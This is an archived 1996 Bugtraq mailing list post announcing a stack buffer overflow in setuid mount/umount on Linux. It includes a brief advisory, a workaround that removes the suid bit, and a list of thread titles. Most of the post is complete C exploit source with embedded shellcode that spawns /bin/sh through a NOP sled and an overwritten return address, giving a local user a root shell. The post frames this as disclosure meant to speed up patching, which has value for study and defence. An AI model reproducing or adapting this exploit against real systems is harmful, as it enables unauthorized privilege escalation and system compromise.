Bugtraq mailing list archives
Vulnrability in all known Linux distributions
From: bloodmask () mymail com (bloodmask)
Date: Tue, 13 Aug 1996 07:04:25 +0200
This is a multi-part message in MIME format. --------------2F3F790C537451604439D8BF Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Greetings, Well folks, After all the other security issues in Linux, I can't say I'm really that shocked about this one, anyway, read the officail covin release. After finding this one, we at covin decided it's time to put and end to this issue, and we've begun scanning all of Linux's suid binaries for other hints of these hidden "features", Results will be released soon. The reason we are also releasing the exploit, an act which may seem highly inresponsable, is due to previous expieriance that making the exploit widely available, ussually speeds up the proccess of patching up stupid vulnerabilities like these. BTW, This is kind of out of topic, but I figure, there's nothing wrong with killing two birds with one stone... Ijust noticed when installing the latest version of the shadow suite, taken from sunsite, that it "unpatched" the lib enviorment vulnerability on my system. I haven't had the time to determine *HOW* it exposed my system, but it would be wise to check up on this matter. --------------2F3F790C537451604439D8BF Content-Type: text/plain; charset=us-ascii; name="cvnmount.exploit" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="cvnmount.exploit" Covin Security Releases: (mount bufferoverflow exploit v1.0) Tested operated systems: All current distributions of Linux Affect: Local users on systems affected can gain overflow mounts syntax buffer and execute a shell by overwriting the stack. Affected binaries: (/bin/mount and /bin/umount) Workaround: On all current distributions of Linux remove suid bit of /bin/mount and /bin/umount. [chmod -s /bin/mount;chmod -s /bin/umount] Remarks: For gods sake, how many more times are we gonna see this kind of problem? It's been with Linux since it's very beggining, and it's so easy to exploit. Similiar buffer overflow vulnerabilities have been found in Linux distributions many times before, splitvt, dip, just to name a few examples. Any remarks, notes or other forms of feedback may be redirected to: bloodmask () mymail com <------------------------------[ Cut here ]----------------------------------> /* Mount Exploit for Linux, Jul 30 1996 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````""::::::::: :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`:::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ :::::: :::::::...........:::...........:::...........::.......:......:.......:::::: :::::::::::::::::::::::::::::::::::::::::::::::;:::::::::::::::::::::::::::: Discovered and Coded by Bloodmask & Vio Covin Security 1996 */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <sys/stat.h> #define PATH_MOUNT "/bin/umount" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n"); execl(PATH_MOUNT, "mount", buff, NULL); } --------------2F3F790C537451604439D8BF--
Current thread:
- Re: IRIX 5.3 chost Grant Kaufmann (Aug 07)
- <Possible follow-ups>
- Re: IRIX 5.3 chost Bill Nickless (Aug 11)
- Re: IRIX 5.3 chost Grant Kaufmann (Aug 12)
- Re: IRIX 5.3 chost Vern Hart (Aug 12)
- Re: IRIX 5.3 chost Mike Kienenberger (Aug 12)
- mail storm Dan Stromberg (Aug 12)
- Re: mail storm Dan Stromberg (Aug 12)
- Re: mail storm Arik Baratz (Aug 13)
- Re: mail storm Albert Lunde (Aug 12)
- Re: mail storm Igor Chudov @ home (Aug 12)
- Vulnrability in all known Linux distributions bloodmask (Aug 12)
- Re: Vulnrability in all known Linux distributions Steve Czetty (Aug 13)
- Re: Vulnrability in all known Linux distributions Alan Brown (Aug 13)
- Re: Vulnrability in all known Linux distributions Elliot Lee (Aug 13)
- Re: Vulnrability in all known Linux distributions Alan Cox (Aug 14)
- mount/umount realpath() buffer overflow David J. Meltzer (Aug 13)
- Possible bufferoverflow condition in lpr, xterm and xload bloodmask (Aug 12)
- Re: Possible bufferoverflow condition in lpr, xterm and xload Digital Dreamer (Aug 12)
- Re: Possible bufferoverflow condition in lpr, xterm and xload Casper Dik (Aug 13)
- Re: Possible bufferoverflow condition in lpr, xterm and xload Mike Acar (Aug 13)
- Re: Possible bufferoverflow condition in lpr, xterm and xload Elliot Lee (Aug 13)